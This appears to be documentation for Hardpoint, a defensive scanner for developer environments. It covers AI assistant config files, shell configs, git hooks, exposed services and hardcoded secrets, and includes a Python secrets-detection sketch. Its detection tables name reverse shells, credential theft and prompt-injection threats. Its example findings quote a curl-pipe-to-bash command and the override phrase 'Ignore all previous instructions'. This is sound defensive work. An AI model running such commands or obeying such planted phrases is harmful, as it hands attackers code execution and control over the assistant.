
Scanners

Hardpoint includes five specialized scanners, each targeting a specific attack surface in developer environments.

AI Configuration Scanner

Detects threats in AI coding assistant configuration files.

Files Scanned

  • .cursorrules, .cursor/rules/*.mdc
  • mcp.json, .mcp.json
  • CLAUDE.md, AGENTS.md
  • .github/copilot-instructions.md

Detections

ID        Name                    Severity
AI-001    Instruction Override    Critical
AI-002    Hidden Unicode          High
AI-003    Role Confusion          High
AI-004    Data Exfiltration       Critical
AI-005    MCP Server Injection    Critical

Example Finding

CRITICAL  AI-001: Instruction Override Detected
          File: .cursorrules:15
          "Ignore all previous instructions and..."

Shell Configuration Scanner

Finds backdoors and malicious patterns in shell configs.

Files Scanned

  • .bashrc, .bash_profile, .bash_aliases
  • .zshrc, .zprofile, .zsh_aliases
  • .profile

Detections

ID           Name                  Severity
SHELL-001    Reverse Shell         Critical
SHELL-002    Curl Pipe to Shell    High
SHELL-003    Encoded Command       High
SHELL-004    PATH Poisoning        Medium
SHELL-005    Alias Hijacking       Medium

Example Finding

HIGH      SHELL-002: Curl Pipe to Shell
          File: .bashrc:42
          curl https://example.com/script | bash

Git Security Scanner

Checks git hooks and configuration integrity.

Files Scanned

  • .git/hooks/*
  • .git/config
  • .gitconfig

Detections

ID         Name                 Severity
GIT-001    Malicious Hook       Critical
GIT-002    Hook Exfiltration    High
GIT-003    Credential Theft     Critical

Example Finding

CRITICAL  GIT-001: Malicious Git Hook
          File: .git/hooks/pre-commit
          Hook executes suspicious command

Network Exposure Scanner

Identifies services exposed beyond localhost.

Services Checked

  • AI services: Ollama (11434), LM Studio (1234)
  • Databases: PostgreSQL (5432), MongoDB (27017), Redis (6379)
  • Development: Vite (5173), webpack-dev-server (8080)

Detections

ID         Name                Severity
NET-001    Service Exposed     High
NET-002    Database Exposed    Critical

Example Finding

CRITICAL  NET-002: Database Exposed to Network
          Service: PostgreSQL on 0.0.0.0:5432
          Should bind to 127.0.0.1 instead

Secrets Scanner

Finds hardcoded credentials using patterns and entropy analysis.

Files Scanned

  • .env, .env.*
  • Shell configurations
  • AWS credentials (~/.aws/credentials)
  • Configuration files

Detections

ID                Name                   Severity
SECRET-001        AWS Access Key         Critical
SECRET-002        GitHub Token           High
SECRET-003        Private Key            Critical
SECRET-004        API Key                High
SECRET-ENTROPY    High-Entropy String    Medium

Example Finding

CRITICAL  SECRET-001: AWS Access Key Detected
          File: .env:5
          AKIAIOSFODNN7EXAMPLE
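
The pattern-plus-entropy approach described for this scanner, as an added Python sketch; it is not Hardpoint's own code. The 20-character minimum, the 4.0 bits-per-character threshold and the function names are assumptions, and the .env content is constructed around the sample key from the finding above.

```python
import math
import re
from collections import Counter

# AWS access key IDs: "AKIA" followed by 16 uppercase letters or digits.
AWS_KEY_RE = re.compile(r"\b(AKIA[0-9A-Z]{16})\b")
# KEY=value lines as found in .env files; optional "export" and quotes.
ASSIGN_RE = re.compile(r"""^\s*(?:export\s+)?([A-Za-z_]\w*)\s*=\s*["']?([^"'\s#]+)""")
# Assumed thresholds for this sketch, not Hardpoint's actual values.
MIN_LEN, MIN_ENTROPY = 20, 4.0  # characters, bits per character

def shannon_entropy(s):
    """Bits per character of the empirical character distribution of s."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def redact(value):
    """Keep only a short prefix so the report does not re-leak the secret."""
    return value[:4] + "*" * (len(value) - 4)

def scan_env(text, filename=".env"):
    """Return (severity, rule_id, location, redacted_value) findings."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # commented-out lines are ignored in this sketch
        loc = f"{filename}:{lineno}"
        m = AWS_KEY_RE.search(line)
        if m:
            findings.append(("CRITICAL", "SECRET-001", loc, redact(m.group(1))))
            continue  # a pattern hit wins; skip the entropy fallback
        m = ASSIGN_RE.match(line)
        if m and len(m.group(2)) >= MIN_LEN \
                and shannon_entropy(m.group(2)) >= MIN_ENTROPY:
            findings.append(("MEDIUM", "SECRET-ENTROPY", loc, redact(m.group(2))))
    return findings

# Constructed sample input; the AWS key is the example value shown above.
SAMPLE_ENV = """\
# local settings
APP_NAME=demo
BIND_ADDR=127.0.0.1
LOG_PATH=/var/log/application/output.log
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
SESSION_TOKEN=q7Zk2Lw9XbT4mNc8RvH1yJp6sDf3Ga0U
"""

if __name__ == "__main__":
    for finding in scan_env(SAMPLE_ENV):
        print(*finding)
```

The long log path stays below the entropy threshold because its characters repeat, while the 32-character token with no repeated character scores 5.0 bits and is flagged.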

Running Specific Scanners

# Run single scanner
hardpoint scan ai

# Run multiple scanners
hardpoint scan ai shell secrets

# Run all scanners (default)
hardpoint scan